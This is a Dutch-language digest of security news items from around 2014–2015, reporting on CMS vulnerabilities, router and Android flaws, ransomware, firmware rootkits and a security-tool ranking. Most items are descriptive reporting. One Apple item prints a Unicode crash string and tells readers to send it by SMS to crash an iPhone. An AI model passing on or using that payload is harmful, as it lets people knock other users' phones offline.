    Het beveiligingslek in de populaire contentmanagementsoftware werd opgemerkt door beveiligingsbedrijf Sucuri. Sites die van de software gebruikmaken kunnen door een aanvaller worden gebruikt om verkeer naar willekeurige sites om te leiden of kwaadaardige code uit te voeren. Het opensourceproject achter Joomla heeft het lek gedicht in versie 3.4.6, deze is via een update beschikbaar.

  • Linksys logo (27 pix)Linksys-routers van de serie EA6100 tot EA6300 zijn kwetsbaar door meerdere cgi-scripts. Deze scripts zijn te gebruiken door een ongeautoriseerde aanvaller, waardoor deze toegang kan krijgen tot het beheerderswachtwoord van het apparaat.

    The Register meldt dat de kwetsbaarheden zijn gevonden door het bedrijfKoreLogic, dat een rapport over de bevindingen heeft gepubliceerd. Onder andere bootloader_info.cgi, sysinfo.cgi, ezwifi_cfg.cgi en qos_info.cgi kunnen gebruikt worden om de instellingen van de routers aan te passen. Hiermee kon bijvoorbeeld het beheerderswachtwoord achterhaald worden.

  • barcodeHele bedrijfsprocessen zijn afhankelijk van streepjescodes, maar hackers kunnen die code misbruiken om op relatief eenvoudige wijze toegang te krijgen tot de achterliggende computersystemen. Met een code, genaamd Badbarcode, zijn hackers in staat om met barcode scanners en een gemanipuleerde streepjescode een shell-venster op een host-computer te openen en zo commando’s uit te voeren.
    De hack werd afgelopen week tijdens de PanSec 2015 conferentie in Tokyo gedemonstreerd. “Badbarcode kan het hostsysteem in principe elk commando laten uitvoeren”, waarschuwt een van de onderzoekers van het Tencent’s Xuanwu Lab op Threatpost.

  • chrome4android zerodayHackers hebben een nieuwe manier bedacht om je Android-smartphone te hacken en zo op afstand totale controle over het toestel te krijgen. Dit is onafhankelijk van de android versie, dit betekend dat ook de meest up-to-date versie van het Android besturingssysteem zijn kwetsbaar.

  • ransomwareOnderzoeker zijn erin geslaagd de Linux.Encoder-ransomware voor Linux te kraken, zodat slachtoffers zonder te betalen hun bestanden kunnen terugkrijgen. De ransomware werd vorige week door het anti-virusbedrijf Doctor Web aangekondigd. Destijds was onbekend hoe de ransomware zich verspreidde.

    Wel was bekend dat het voornamelijk webservers waren die werden geïnfecteerd. Nu meldt het Roemeense anti-virusbedrijf Bitdefender dat aanvallers een kwetsbaarheid in het populaire contentmanagementsysteem Magento gebruiken om toegang tot servers te krijgen. Vervolgens installeren ze de ransomware, die erg veel op Windows-ransomware lijkt. Net als Windows-gebaseerde ransomware versleutelt Linux.Encoder bestanden met AES. De symmetrische sleutel wordt dan versleuteld met een asymmetrisch encryptie algoritme (RSA).

  • vbulletinOp internet is een exploit voor een ernstig beveiligingslek in de populaire forumsoftware vBulletin verschenen, waardoor kwaadwillenden eenvoudig ongepatchte websites kunnen overnemen. Vorige week werd de website van vBulletin gehackt. Daarop volgde een wachtwoordreset voor 345.000 gebruikers.

  • joomla logoCms-bouwer Joomla heeft drie beveiligingsproblemen gepatcht, waaronder een zeer kritiek lek waardoor een sql-injectie uitgevoerd kan worden. Het sql-probleem zit in versie 3.2 tot en met 3.4.4 en werd ontdekt door Trustwave SpiderLabs. De patch hoogt het versienummer iets op naar 3.4.5.

    De onderzoekers van Trustwave konden volledige toegang krijgen tot elke kwetsbare Joomla-site, schrijft Trustwave op zijn blog. Joomla had op 20 oktober volgens W3Techs 6,6 procent van de markt voor website-cms'en in handen, wat zou betekenen dat zo'n 2,8 miljoen websites draaien op het cms. De patch naar Joomla 3.4.5 is te downloaden vanaf de Joomla-site. Naast de drie beveiligingsupdates is er niets veranderd aan de code van het cms.

  • ntpOnversleuteld verkeer op basis van het network time protocol is te onderscheppen waarna de tijd van clients is aan te passen. Dit gegeven is te misbruiken bij onder andere https-, dnssec- en bitcoin-aanvallen, claimen onderzoekers.

    De onderzoekers van Boston University beschrijven de manieren waarop een aanvaller verkeer naar een ntp-server kan onderscheppen en wat de gevolgen kunnen zijn van het aanpassen van de tijden. Het network time protocol of netwerktijdprotocol is een protocol uit 1985 dat voor kloksynchronisatie tussen systemen zorgt. Dat ntp-servers te misbruiken zijn voor ddos-aanvallen was al bekend en ook werd er al op de mogelijkheid van man-in-the-middle-aanvallen gewezen. De onderzoekers hebben nu de verschillende aanvallen en hun implicaties in kaart gebracht.

  • webcamEen onderzoeker heeft in mogelijk tienduizenden IP-camera's op internet een ongedocumenteerde telnetpoort ontdekt waardoor er met een bekend standaardwachtwoord op de apparaten kan worden ingelogd. Het probleem zou bij goedkope IP-camera's van verschillende fabrikanten spelen.

    Om welke fabrikanten het gaat wil Zoltan Balazs niet bekendmaken. Via een netwerkscan wist hij de ongedocumenteerde telnetpoort te vinden. Balazs laat echter weten dat andere onderzoekers hetzelfde probleem eerder al hebben ontdekt, alleen dan via een analyse van de firmware. Het probleem is dat het wachtwoord om op de telnetpoort in te loggen niet via een grafische gebruikersinterface kan worden gewijzigd.

  • upnpHet Universal Plug and Play (UPnP) protocol moet het eenvoudiger voor apparaten maken om met elkaar te communiceren en verbinding te maken, maar een onbekend aantal routers heeft de beveiliging niet goed geregeld, waardoor een aanvaller stilletjes poorten in de firewall kan openzetten of toegang tot de router kan krijgen.

    Daarvoor waarschuwt het CERT Coordination Center (CERT/CC) van de Carnegie Mellon Universiteit. Het UPnP-protocol was oorspronkelijk ontwikkeld voor privénetwerken en gebruikt standaard dan ook geen authenticatie. Later werd er besloten om toch een UPnP-beveiligingsstandaard op te stellen, maar ondersteuning hiervan is zeer beperkt. Vanwege de ontbrekende beveiliging kan een aanvaller met toegang tot het privénetwerk via UPnP toegang tot de router krijgen om vervolgens poorten open te zetten of diensten in te schakelen waarmee het netwerk verder kan worden aangevallen.

  • BGP hijackingDe ip-adressen die in november 2014 werden gekaapt door een groep Bulgaarse criminelen, blijken tijdelijk te zijn ontvreemd via het border gateway protocol. Dat heeft onderzoek uitgewezen, schrijft minister Koenders van Buitenlandse Zaken in een brief aan de kamer.

    In juli werd via de Volkskrant bekend dat verschillende ip-adressen in het blok 193.177.64.0/18 tussen 19 en 26 november 2014 in handen zijn geweest van Bulgaarse criminelen. De adressen behoren toe aan het ministerie van Buitenlandse Zaken. Naar aanleiding van deze gebeurtenis, stelde Kamerlid Oosenbrug van de PvdA vragen aan de minister. Donderdag deelde de minister zijn antwoorden schriftelijk mee.

  • Windows 10 logo whiteHet is mogelijk om via de ingebouwde ssh-server van smartphones die op Microsofts Windows 10 Mobile draaien, volledige toegang te krijgen tot het bestandssysteem nadat Device Discovery is ingeschakeld. Via het standaard mtp-protocol in Windows is die toegang niet mogelijk.

    Dat schrijft xda-forumlid snickler op het xda-ontwikkelaarsforum. Microsoft voegde overigens zelf al een bestandsverkenner toe aan Windows 10 Mobile. Voor 8.1 moest daar nog de Files for Windows Phone 8.1-app gedownload worden. Met de nieuwe verkenner krijgen gebruikers echter geen volledige toegang, waardoor bepaalde onderdelen ontoegankelijk blijven.

  • androidGoogle is onlangs begonnen met de uitrol van een patch om te beschermen tegen de Stagefright-bug in Android, maar volgens beveiligingsbedrijf Exodus is de software niet afdoende. De bug zou nog steeds te misbruiken zijn. Google zegt aan een tweede patch te werken.

    In een blogpost stelt Exodus dat het een Nexus 5 die was voorzien van de patch, die overigens bestaat uit vier regels nieuwe code, kon hacken via de Stagefright-bug. Op zijn blog geeft Exodus de technische details om de beveiliging te omzeilen, waarmee het dus aantoont dat de bugfix waarvan Google eerder de uitrol startte, niet afdoende is om het lek in Android te repareren.

  • androidEen lek in alle Android-versies van 4.3 tot en met M Preview 1 zorgt ervoor dat aanvallers door middel van een nep-app zonder bijzondere toestemmingen complete controle over een toestel wisten te krijgen. Google heeft het lek voorafgaand aan de onthulling gedicht.

    IBM Security Intelligence stelt dat het lek in 55 procent van de Android-installaties voorkwam. De hack slaagde dankzij een kwetsbaarheid in de OpenSSLX509Certificate-class. Doordat op die manier een kwaadwillende app aanvullende systeemrechten kon verkrijgen, was het niet nodig om in de Google Play Store om naar bijzondere toestemmingen te vragen. De onderzoekers hebben de exploit geprobeerd op een Nexus 5 met Android 5.1.1.

  • androidOnderzoekers hebben een ernstig beveiligingslek in Android ontdekt waardoor het mogelijk is om toegang tot toestellen te krijgen door alleen een mms-bericht te versturen. Vervolgens kan een aanvaller informatie stelen, e-mails lezen, de microfoon inschakelen en andere taken uitvoeren. De kwetsbaarheid bevindt zich in Stagefright, een mediabibliotheek die verschillende populaire mediaformaten verwerkt.

    Beveiligingsbedrijf Zimperium ontdekte de kwetsbaarheid in het Android-onderdeel, dat het zelf het ergste Android-lek tot nu toe noemt.

  • wordpress securityIn het veelgebruikte contentmanagementsysteem WordPress is opnieuw een security issues ontdekt. Het advies is om direct te upgraden naar versie 4.2.3.

    Het lek die het WordPress-ontwikkelteam zelf constateerde, betreft een cross-site scripting (XSS) kwetsbaarheid. Een aanvaller kan via de 'Contributor of Author'-rol de controle over de site overnemen.

    Er is enige discussie over de vraag of het een kritiek lek betreft?!
    Het lek is immers niet zonder enige vorm van authenticatie te misbruiken, maar het WordPress-team adviseert wel om de update naar versie 4.2.3 direct door te voeren. Meer informatie is te vinden op de WordPress.org site.

  • rc4 encryptionDe encryptiemethode rc4 die onder andere gebruikt wordt in wpa-tkip-versleutelingen en het tls-internetbeveiligingsprotocol, kan inmiddels in 52 uur gekraakt worden. Dat hebben onderzoekers van de Katholieke Universiteit in Leuven gedemonstreerd.

    Hoewel het gebruik in de afgelopen jaren is afgenomen, wordt rc4 nog ongeveer in 30 procent van https-verbindingen gebruikt, stellen de onderzoekers Mathy Verhoef en Frank Piessens op een website die ze speciaal hebben opgezet om mensen af te raden om rc4 in te zetten. In een video tonen de Belgen hoe een aanvaller een cookie onderschept van een website die op tls-beveiliging met rc4-versleuteling draait. Daarna wordt de cookie in korte tijd ontsleuteld en is de aanvaller ingelogd op een website alsof hij daadwerkelijk de gebruikersnaam en het wachtwoord van zijn slachtoffer heeft achterhaald.

  • hackingteam logoHet omstreden Hacking Team gebruikte een uefi-rootkit om zijn software te allen tijde op een besturingssysteem te laten staan. Dit betekent dat een herinstallatie van het operating system, en zelfs het vervangen van een harde schijf, de spyware niet direct verwijderde.

    Beveiligingsbedrijf Trend Micro ontdekte dat Hacking Team een manier ontwikkelde om misbruik te maken van de firmware van biosfabrikant Insyde, die door onder meer HP, Dell en Lenovo wordt gebruikt. De code werkte vermoedelijk ook bij technologie van concurrent American Megatrends Incorporated. Het is niet duidelijk of dit momenteel voor firmware van beide fabrikanten nog het geval is.

  • Flash

    Een zero day-exploit die afkomst is van het omstreden beveiligingsbedrijf Hacking Team, wordt misbruikt in minstens drie verschillende exploit-kits. De exploit is afkomstig uit de hack van Hacking Team, waarbij 400 gigabyte aan interne bestanden online werd geplaatst.


    Bij de hack van Hacking Team, dat spionagesoftware maakt voor overheden, maaken aanvallers circa 400 gigabyte aan interne bestanden buit. Daar zit niet alleen interne e-mailcorrespondentie bij, maar ook details van beveiligingsproblemen die het omstreden bedrijf misbruikte om bijvoorbeeld malware op systemen van 'verdachten' te plaatsen.

  • appleApple heeft gisterenavond updates voor Mac OS X, iOS, Safari, iTunes, QuickTime en Mac EFI uitgebracht die bij elkaar 164 kwetsbaarheden verhelpen. De meeste updates, 77 in totaal, verschenen voor Mac OS X in de vorm van OS X Yosemite 10.10.4 en Security Update 2015-005.

    Zo is via deze updates de Logjam-aanval verholpen, alsmede verschillende kwetsbaarheden waardoor een aanvaller in het ergste geval willekeurige code op de computer kon uitvoeren. Dit kon bijvoorbeeld door de gebruiker een kwaadaardig zip-bestand te laten openen. De updates zijn te downloaden via de Mac App Store of Apple's downloadsite.

  • appleEen tekstbericht, bestaande uit een precieze combinatie van Arabische tekens, woorden en letters, is genoeg om een iPhone te laten crashen.

     Stuur onderstaande bericht als sms en de betreffende iPhone crasht:

    effective.  Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗

     

    Tegelijkertijd luistert de combinatie dan wel weer zo nauw dat het nooit per ongeluk zal gebeuren. De inhoud van het bericht gaat rond op social media en sites. Het is voor zeer eenvoudig om iPhone vast te laten lopen. Je hebt dan wel zelf een iPhone nodig, vanaf een Android-toestel werkt het niet.

  • router lekEen kritiek lek in een onderdeel dat "USB over IP" functionaliteit aan routers biedt zorgt ervoor dat miljoenen routers risico lopen. Daarvoor waarschuwt beveiligingsbedrijf SEC Consult. De kwetsbaarheid is aanwezig in de NetUSB-software van het Taiwanese Kcodes.

    Via NetUSB kunnen USB-apparaten, zoals printers, externe harde schijven en USB-sticks, die op een Linux-gebaseerd embedded systeem worden aangesloten, zoals een router of accesspoint, via het netwerk toegankelijk zijn. Hiervoor wordt een Linux-kerneldriver geladen die op poort 20005 een server start.

  • wordpress securityNet als vorige week kampt WordPress met een ernstig cross site scripting-lek, waarmee een aanvaller de controle over een WordPress-installatie kan overnemen. Er is exploitcode verschenen die kan worden misbruikt. WordPress heeft in allerijl een beveiligingsupdate uitgebracht.

    In feite gaat het om twee beveiligingsproblemen, maar slechts een van de twee treft WordPress 4.2, de nieuwste versie van de populaire cms-tool; de andere werkt alleen op oudere versies. De bugs bevinden zich in de commentsectie van WordPress; een aanvaller kan zijn eigen html-code achterlaten in een reactie, waarna die wordt geladen als andere gebruikers op de pagina komen. Dat ontdekte een Finse beveiligingsonderzoeker.

  • Wordpress logoWordPress heeft een nieuwe versie uitgebracht waarin onder meer een 'kritiek' beveiligingslek is opgelost. Het lek werd gevonden door een Belgische beveiligingsonderzoeker. Ook twee kleinere beveiligingsproblemen zijn opgelost.

    Het lek is volgens het ict-beveiligingsteam van de Amerikaanse overheid dermate gevaarlijk dat website-eigenaren het best zo snel mogelijk kunnen updaten naar een nieuwe versie van WordPress. Alle installaties tot en met 4.1.1 zijn kwetsbaar; versie 4.1.2, die deze week is uitgebracht, lost het probleem op.

  • ipad 2 jailbreakEen groot aantal populaire apps voor iPhones en iPads bevat een kwetsbaarheid in de implementatie van https. Hierdoor zou het eenvoudig zijn ssl-verkeer af te tappen op onveilige netwerken. De apps zijn kwetsbaar door gebruik van een oude versie van AFNetworking.

    Het bedrijf SourceDNA vond een manier om het gebruik van AFNetworking bij iOS-apps te monitoren en constateerde dat 1000 apps kwetsbaar waren, waaronder apps van Yahoo, Microsoft, Uber en Citrix. Het bedrijf heeft een zoekmachine online gezet waarmee gebruikers kunnen controleren welke apps kwetsbaar zijn.

    AFNetworking is een opensource-codebibliotheek die veel ontwikkelaars gebruiken voor netwerkfunctionaliteit van hun apps. Versie 2.5.1 van de library, die 12 februari uitkwam, kampte met een bug waardoor er geen validatie van ssl-certificaten plaatsvond. In versie 2.5.2 werd het probleem verholpen maar in de tussentijd waren veel apps bijgewerkt en lang niet alle apps voerden vervolgens de versie door waar de bug niet in zat.

  • iis patchHet Internet Storm Center heeft de alarmfase voor de internetveiligheid opgehoogd naar oranje nu de organisatie op grote schaal misbruik ziet van een kritiek lek in het Windows-component http.sys. Microsoft heeft het lek gedicht, maar het gat wordt nu gebruikt voor ddos-aanvallen.

    Volgens het Internet Storm Center zijn er 'internetbreed' netwerkscans en exploits gesignaleerd die zoeken naar kwetsbare webservers die de kwetsbaarheid in http.sys nog niet gepatcht hebben. De servers die IIS-webserversoftware draaien bovenop Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1 en Windows Server 2012 R2 kunnen zo slachtoffer worden van ddos-aanvallen.

  • wordpress securityEen beveiligingsbedrijf heeft onlangs tijdens een routinecontrole een xss-kwetsbaarheid gevonden in WordPress. Door het lek kunnen kwaadwillenden malafide code injecteren en uitvoeren. In potentie zijn ruim een miljoen actieve installaties vatbaar.

    Beveiligingsbedrijf Sucuri was naar eigen zeggen bezig met een routine-audit toen het een 'gevaarlijk' xss-lek ontdekte in de populaire WordPress-plugin WP-Super-Cache. Met de plugin zijn php-scripts van WordPress om te zetten in statische html-bestanden, waarmee de website sneller te serveren is.

  • Aanvallers veranderen via javascript de dns-instellingen van een router, om vervolgens advertenties te kunnen serveren op andere websites. Dat blijkt uit onderzoek van Ara Labs. Aanvallers gebruiken de code van Google Analytics om de advertenties te kunnen serveren.

    Rogue DNS

    De hack, waarvan de reikwijdte onbekend is, bestaat grofweg uit twee stadia, legt Ara Labs uit. Allereerst moeten aanvallers de dns-instellingen van de router van een potentieel slachtoffer wijzigen, zodat de router de dns-server van de aanvallers gebruikt. Daartoe proberen aanvallers via een exploit-kit en met behulp van javascript de router-instellingen te wijzigen. Ze misbruiken daartoe een kwetsbaarheid in de router, of proberen standaard-gebruikersnamen en -wachtwoorden.

  • biosKwetsbaarheden in het bios zorgen ervoor dat vrijwel alle pc's momenteel vatbaar zijn voor malware. Beveiligingsonderzoekers hebben op een beveiligingsconferentie een proof-of-concept getoond van dergelijke malware, die 80 procent van de pc's zou kunnen infecteren.

    Omdat de malware actief is op het niveau van het bios, maakt het gebruikte besturingssysteem niet uit. De onderzoekers tonen in hun presentatie proof-of-concepts met zowel Windows 10 als Tails, het beveiligde op Linux gebaseerde besturingssysteem dat zijn sporen wist op het moment dat het zichzelf afsluit. Met hun methode konden de onderzoekers een pgp-sleutel vanuit Tails onderscheppen.

  • drupal securityDrupal, een van de meest gebruikte open source content management systeem adviseert haar gebruikers om hun software te updaten naar de nieuwste versies 6.35 en 7.35.  Er zijn 2 kritieke kwetsbaarheden opgelost. Er was een fout gevonden in Drupal core die het voor een potentiële hacker, onder bepaalde omstandigheden, de beveiliging kan omzeilen door het vervalsen van de wachtwoord reset URL's.

  • Beveiligingsexpert Egor Homakov van Sakurity heeft een tool waarmee hackers de accounts kapen op sites die een Facebook-logins gebruiken. Egor Homakov heeft het hack tool 'reconnect' genoemd. 

    Hij meldde de fout aan Facebook een jaar geleden, maar het bedrijf loste de bug niet op om compatibel te blijven met een groot aantal websites die de dienst van het sociale netwerk reus gebruikt voor hun login-proces.

  • memory banksOnderzoekers van Google zijn er in geslaagd om op een x64-systeem met ddr3-geheugen bits in het geheugen te manipuleren door gebruik te maken van tekortkomingen in het fysieke geheugen. Door bepaalde plekken in het geheugen telkens te benaderen, kunnen aangrenzende bits worden 'geflipt'.

    Door de aanval zou een proces met normale gebruikersrechten schrijftoegang kunnen krijgen tot andere, beveiligde delen van het geheugen. Dat schrijven de onderzoekers van Googles Project Zero. Daarmee zouden aanvallers met normale gebruikersrechten bijvoorbeeld root-toegang kunnen krijgen, een sandbox kunnen omzeilen of zelfs uit een virtuele machine kunnen breken.

  • seagate nasEen onderzoeker heeft een kritiek lek in verschillende NAS-systemen van harde schijffabrikant Seagate ontdekt waardoor een aanvaller mogelijk duizenden van deze apparaten op internet kan overnemen, maar ondanks een maandenlange communicatie over het probleem is er nog altijd geen update voor getroffen gebruikers beschikbaar.

    Het probleem speelt in de Seagate Business NAS-systemen, die volgens de onderzoeker van Beyond Binary zowel door consumenten als bedrijven worden gebruikt. Via de systemen is het mogelijk om data op te slaan en te delen. Voor het aanmaken van gebruikers, instellen van toegangsrechten, beheren van bestanden en andere zaken zijn de NAS-systemen van een webmanagementapplicatie voorzien.

  • slimstat pluginWordPress website beheerders die de WP Slimstat Web analytics plugin gebruiken worden geadviseerd om deze zo spoedig mogelijk te updaten. De plugin wordt geteisterd door een ernstige kwetsbaarheid die kan worden benut om in te breken in de database van de site.

    WP Slimstat maakt gebruik van een geheime sleutel om de gegevens tussen de client en de server te versleutelen. Het probleem, volgens onderzoekers van Sucuri, is dat de geheime sleutel een hash is van de installatie 'timestamp'. Deze kan gemakkelijk worden gekraakt met een bruteforce aanval.

    Een aanvaller kan diensten zoals het Internet Archive gebruiken het jaar waarin de website gelanceerd werd te bepalen. De onderzoekers merkten op dat zodra het jaar wordt vastgesteld, de aanvaller zo ongeveer 30 miljoen waarden moet testen. Dit is een taak die een moderne CPU binnen 10 minuten kan uitvoeren.

  • samsungstv logoDe stemopdrachten die slimme televisies van Samsung opslaan en naar een derde partij doorsturen worden onversleuteld verstuurd, zo heeft een beveiligingsonderzoeker ontdekt. Onlangs ontstond er grote ophef over de stemherkenning van de Samsung SmartTV, waarmee consumenten via stemopdrachten de televisie kunnen besturen.

    Beveiligingsonderzoeker David Lodge besloot het verkeer dat van de televisie afkomstig is te onderzoeken. Hij zag daarbij een verbinding over poort 443, dat normaliter HTTPS aangeeft. Vervolgens besloot Lodge de inhoud van de datastroom te bekijken en zag dat het helemaal niet om versleutelde data ging. Het was zelfs geen HTTP-data, maar een combinatie van XML en een binair datapakket.

  • hackerNadat Sony Pictures gehackt is en door bedreigingen de film 'The Interview' niet uitbrengt staat hacken weer volop in de schijnwerpers. Door de jaren heen heeft de wereld een aantal joekels van hackschandalen gezien. Veel daarvan waren gericht tegen banken, maar ook bedrijven als supermarktketen 7-Eleven werden slachtoffer. Een overzichtje van vijf van de grootste hacks aller tijden:

    • In 2013 kwam aan het licht dat vijf Russen en een Oekraïener ruim zeven jaar lang grote Amerikaanse bedrijven als supermarktketen 7-Eleven en Nasdaq hackten. Ze wisten zo meer dan 160 miljoen creditcardnummers en 800.000 bankrekeningen buit te maken. Ook wisten de zes zich toegang te verschaffen tot de servers van de Amerikaanse technologiebeurs Nasdaq. De schade bedroeg meer dan 300 miljoen dollar. 
  • mongodbOnderzoekers hebben op internet duizenden MongoDB-databases ontdekt die direct via het internet toegankelijk zijn, waardoor gevoelige informatie gevaar kan lopen. MongoDB is een opensource NoSQL-database die door verschillende grote websites en diensten wordt gebruikt, alsmede tal van kleinere sites.

    Volgens onderzoekers van het Duitse Center for IT-Security, Privacy, and Accountability (CISPA) kan een minder ervaren systeembeheerder bij het opzetten van een MongoDB-webserver vergeten om belangrijke beveiligingsmaatregelen in te stellen. "Dit leidt tot een volledig open en kwetsbare database die iedereen kan benaderen, en erger, kan manipuleren."

    Standaard draait MongoDB op TCP-poort 27017. Een aanvaller zou alleen een poortscan hoeven uit te voeren om de databases te vinden.

  • Een overzicht van de  top 10 Security tools (2014) gekozen door ToolsWatch.org lezers.

    01 – Unhide (Nieuw)
    02 – OWASP ZAP – Zed Attack Proxy Project (-1↓)
    03 – Lynis (+3↑)
    04 – BeEF – The Browser Exploitation Framework (-2↓)
    05 – OWASP Xenotix XSS Exploit Framework (0→)
    06 – PeStudio (-2↓)
    07 – OWASP Offensive (Web) Testing Framework (Nieuw)
    08 – Brakeman (Nieuw)
    09 – WPScan (0→)
    10 – Nmap (Nieuw)

     

    logo_ghostbuster

    01 – Unhide

    Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique. Unhide runs in Unix/Linux and Windows Systems. It implements six main techniques.

  • Verschillende routers van netwerkfabrikant D-Link bevatten een kwetsbaarheid waardoor een aanvaller op afstand en zonder inloggegevens de DNS-instellingen van de apparaten kan aanpassen. Op deze manier kan de aanvaller het verkeer van de gehackte router via zijn servers laten lopen, zo meldt PC World.

    De kwetsbaarheid bevindt zich in de ZynOS-routerfirmware, ontwikkeld door fabrikant ZyXEL. Naast D-Link wordt de firmware ook door andere fabrikanten gebruikt, waaronder TP-Link en ZTE.

  • pirate bayThe Pirate Bay is weer begonnen met het serveren van torrents. Op de site stond lange tijd een timer die aftelde naar 1 februari. Nu blijkt dat deze verwees naar de terugkeer van de piraterijwebsite. Volgens geruchten is het team achter de site wel 'afgeslankt' na een ruzie.

    De site lijkt verder volledig functioneel. Met het terugbrengen van de piraterijwebsite lijkt The Pirate Bay het aflopen van de teller niet te hebben afgewacht: de terugkeer werd pas in de nacht van zaterdag op zondag verwacht. De originele hoofdpagina van de site, met zoekfunctie, was al hersteld maar was voor zaterdag nog niet te gebruiken.

  • drone hackingEr zijn meer dan 70 landen die afstandbestuurbare drones bouwen. De meeste van deze drones zijn in staat om zelfstandig beslissingen te nemen. Maar hoe veilig zijn ze nu? Wat is mogelijkheden dat er een backdoor in deze drone aanwezug is? Wat zijn de mogelijkheden om een backdoor op een drone te installeren? Wat zouden de gevolgen zijn als een lek wordt gevonden in een computer die zelf beslissingen kan maken? 

    Volgende maand (feb. 2015) zullen onderzoekers de eerste malware demonstreren die speciaal voor vliegende drones is ontwikkeld. Maldrone, zoals de malware heet, geeft de maker volledige controle over het onbemande vliegtuigje en is voor surveillance te gebruiken. Ook kan een besmette drone andere drones infecteren. 

  • password"123456" was vorig jaar weer het populairste wachtwoord op internet en voert daarmee wederom de lijst aan van slechtste wachtwoorden, zo meldt SplashData. Het bedrijf analyseerde meer dan 3,3 miljoen wachtwoorden, afkomstig uit allerlei gelekte databases en wachtwoordlijsten.

    Sinds 2011 is "123456" het meest aangetroffen wachtwoord, gevolgd door "password". Eenvoudige numerieke wachtwoorden blijven populair, alsmede het wachtwoord "qwerty". Nieuw in de Top 10 waren "baseball", "dragon" en "football". Internetgebruikers krijgen dan ook het advies om voor hun wachtwoord geen sporten, geboortedata, namen en woordenboekwoorden te gebruiken.

  • siriOnderzoekers hebben een manier ontwikkeld waardoor het mogelijk is om gegevens van een besmette gejailbreakte iPhone via de Siri-spraakbesturing te stelen. Als gebruikers met Siri communiceren wordt hun stem tot data verwerkt en dit naar Apple gestuurd, waar de steminvoer naar tekst wordt vertaald.

    Onderzoekers Luca Caviglione en Wojciech Mazurczy hebben een aanval ontwikkeld waarbij Siri wordt gebruikt om een geheim kanaal tussen een besmet apparaat en een botmaster op te zetten zodat die gevoelige gegevens als wachtwoorden, creditcardnummers en Apple ID's kan stelen.

  • pirelli routerEen Spaanse beveiligingsonderzoeker heeft een ernstig lek in de ADSL-routers van fabrikant Pirelli openbaar gemaakt nadat zowel Pirelli als de Spaanse internetprovider Movistar Telefonica de kwetsbaarheid al twee jaar negeren. Eduardo Novella ontdekte dat het mogelijk is om de beheerderpagina's van de router direct via het internet en zonder wachtwoord te benaderen.

    Het enige dat een aanvaller moet weten is de naam van de betreffende beheerderpagina en het IP-adres van de router. Vervolgens kan een aanvaller wachtwoorden van het wifi-netwerk opvragen, DNS-servers aanpassen, poorten openzetten en meer. De onderzoeker ontdekte meer dan 150 HTML-pagina's die direct benaderbaar zijn. Novella rapporteerde het probleem in de Pirelli ADSL2/2+ Wireless Router P.DGA4001N begin 2013 aan Pirelli en Movistar Telefonica, de grootste internetprovider in Spanje. Movistar Telefonica levert de ADSL-routers namelijk aan klanten.

  • DOS attackEen DDoS-dienst die onlangs werd gelanceerd blijkt op duizenden gehackte thuisrouters te draaien. Het gaat om de "Lizard Stresser" van de groep "Lizard Squad". Deze groep voerde tijdens de afgelopen kerst aanvallen op het Sony PlayStation Network en Microsoft Xbox Live uit, waardoor beide netwerken enige tijd onbereikbaar waren. Een aantal dagen na de aanvallen liet de groep weten dat het om een promotiestunt ging, als aankondiging van hun DDoS-dienst.

    Daarmee kunnen mensen tegen betaling DDoS-aanvallen op websites laten uitvoeren. Na de aanvallen werden twee vermeende leden van de groep door de autoriteiten opgepakt.

  • asus routerEen beveiligingsonderzoeker heeft gisterenavond een lek in verschillende routers van fabrikant Asus onthuld waardoor een lokale aanvaller het apparaat volledig kan overnemen en waarvoor nog geen beveiligingsupdate beschikbaar is. De kwetsbaarheid wordt veroorzaakt door een dienst genaamd infosvr die op UDP-poort 9999 op de LAN-interface luistert.

    De dienst wordt door een tool van Asus gebruikt en moet het makkelijker maken om de router in te stellen door automatisch naar routers op het lokale subnet te zoeken. Infosvr blijkt echter het MAC-adres van een verzoek niet goed te controleren. Daardoor kan een aanvaller de authenticatie omzeilen en door het versturen van een pakketje naar UDP-poort 9999 willekeurige opdrachten aan de router geven.

  • nsaDe NSA beschikt over een speciale afdeling die vpn-verbindingen hackt. De geheime dienst voertman in the middle-aanvallen uit waarbij communicatie wordt ontsleuteld. Ook ssh- en https-verbindingen worden soms met succes gekraakt. Dat blijkt uit nieuwe gelekte documenten.

    De NSA-afdeling kraakt onder meer verbindingen over het zogeheten point-to-point-tunneling-protocol zonder al te veel moeite. Dat maakten journalisten Laura Poitras en Jacob Appelbaum in samenwerking met Der Spiegel bekend op de CCC-beveiligingsconferentie in Hamburg, op basis van documenten van klokkenluider Edward Snowden. Appelbaum is ook verantwoordelijk voor het Tor-project, dat gebruikers relatief anoniem gebruik laat maken van internet.

  • private surfing smallElke moderne browser heeft een speciale instelling waarmee de browser niets bewaart tijdens het internetten. Dit is handig als je je mail controleert op de computer van iemand anders, maar ook als je iemand anders laat internetten op jouw computer.


    Stap 1: Privé-modus

    Surf je in privé-modus, dan worden er geen sporen van je browse-sessie opgeslagen in de geschiedenis van je browser. De privé-modus is erg handig als je even op de computer van iemand anders werkt.

  • appleEind december zal een onderzoeker laten zien hoe het mogelijk is om op een Apple Macbook een bootkit te installeren die het opnieuw installeren van het besturingssysteem en het vervangen van de harde schijf kan overleven. De bootkit kan via iemand die fysiek toegang tot de laptop worden geïnstalleerd. Hiervoor wordt de extern toegankelijke Thunderbolt-poort gebruikt. Zodra de bootkit actief is kan die zich viraal verspreiden door andere Thunderbolt-apparaten te infecteren.

  • malware1Cybercriminelen hebben dit jaar voornamelijk lekken in Adobe Flash Player, Microsoft Internet Explorer en Silverlight gebruikt om internetgebruikers met malware te infecteren. Dat blijkt uit een analyse van het Japanse anti-virusbedrijf Trend Micro, dat acht verschillende exploitkits analyseerde.

    De exploitkits bevatten exploits die misbruik van lekken maken die niet door internetgebruikers zijn gepatcht. Op een gehackte pagina plaatsen de aanvallers een iframe of JavaScript dat bezoekers, zonder dat ze het doorhebben, naar een pagina stuurt waarop de exploits actief zijn. Exploits voor vier lekken zijn daarbij de grote favoriet, namelijk: Silverlight (CVE-2013-0074), Adobe Flash Player (CVE-2014-0515), Adobe Flash Player (CVE-2014-0569) en Internet Explorer (CVE-2014-2551).

  • clockOnderzoekers van Google hebbenkritieke lekken in het Network Time Protocol (NTP) ontdekt waardoor aanvallers op systemen die van NTP gebruik maken code kunnen uitvoeren. NTP is een protocol waarmee systemen de tijd voor verschillende diensten en applicaties kunnen synchroniseren.

